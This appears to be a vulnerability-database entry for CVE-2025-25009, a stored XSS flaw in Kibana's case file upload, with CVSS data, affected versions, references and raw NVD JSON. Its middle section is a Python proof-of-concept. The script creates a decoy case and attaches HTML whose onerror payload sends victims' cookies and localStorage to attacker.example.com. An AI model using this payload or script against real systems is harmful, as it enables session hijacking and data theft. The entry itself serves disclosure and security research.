CVE-2025-25009

Description

Improper Neutralization of Input During Web Page Generation in Kibana can lead to Stored XSS via case file upload.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE

Kibana < 8.18.8

Kibana 8.19.x < 8.19.5

Kibana 9.0.x < 9.0.8

Kibana 9.1.x < 9.1.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-25009 - Kibana Stored XSS via Case File Upload PoC
# This PoC demonstrates the concept of exploiting stored XSS
# through Kibana's case file upload functionality.

import requests

# Target Kibana instance configuration
KIBANA_URL = "https://kibana-target.example.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to Kibana and obtain session
session = requests.Session()
auth_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(f"{KIBANA_URL}/api/security/v1/login", json=auth_payload)

# Step 2: Craft malicious payload to be embedded in case file
# The malicious script will execute in victim's browser context
malicious_payload = """
<img src=x onerror="fetch('https://attacker.example.com/steal?cookie='+document.cookie+'&data='+JSON.stringify(localStorage))">
"""

# Step 3: Create a case with the malicious file attachment
case_payload = {
    "title": "Security Incident Report",
    "description": "Please review the attached analysis file.",
    "tags": ["security", "investigation"],
}

# Upload file with embedded XSS payload
files = {
    "file": ("report.html", malicious_payload.encode(), "text/html")
}

response = session.post(
    f"{KIBANA_URL}/api/cases",
    json=case_payload
)

case_id = response.json().get("id")

# Step 4: Attach the malicious file to the case
session.post(
    f"{KIBANA_URL}/api/cases/{case_id}/attachments",
    files=files
)

print(f"[+] Malicious case created with ID: {case_id}")
print(f"[+] When a victim views this case, the XSS payload will execute")
print(f"[+] Victim URL: {KIBANA_URL}/app/management/cases/{case_id}")

# Note: Actual exploitation requires the attacker to have valid
# credentials with case creation permissions (low privilege required).
# The victim must have permissions to view the case.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-25009
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-25009
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-25009/
[4] VulDB https://vuldb.com/cve/CVE-2025-25009
[5] https://discuss.elastic.co/t/kibana-8-18-8-8-19-5-9-0-8-and-9-1-5-security-update-esa-2025-20/382449

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-25009", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:36.340", "lastModified": "2025-10-30T14:47:00.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation in Kibana can lead to Stored XSS via case file upload."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "8.18.8", "matchCriteriaId": "DC3153A3-2F19-4238-9365-62F1CEB5BB09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.19.0", "versionEndExcluding": "8.19.5", "matchCriteriaId": "78D0ADE9-3399-4D46-A5C0-45D6B1FF19F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.8", "matchCriteriaId": "A5D3776F-14E6-48FF-9D0B-67A772CD2D98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndExcluding": "9.1.5", "matchCriteriaId": "080EA14F-4F54-43C6-972C-18A40C255928"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-18-8-8-19-5-9-0-8-and-9-1-5-security-update-esa-2025-20/382449", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}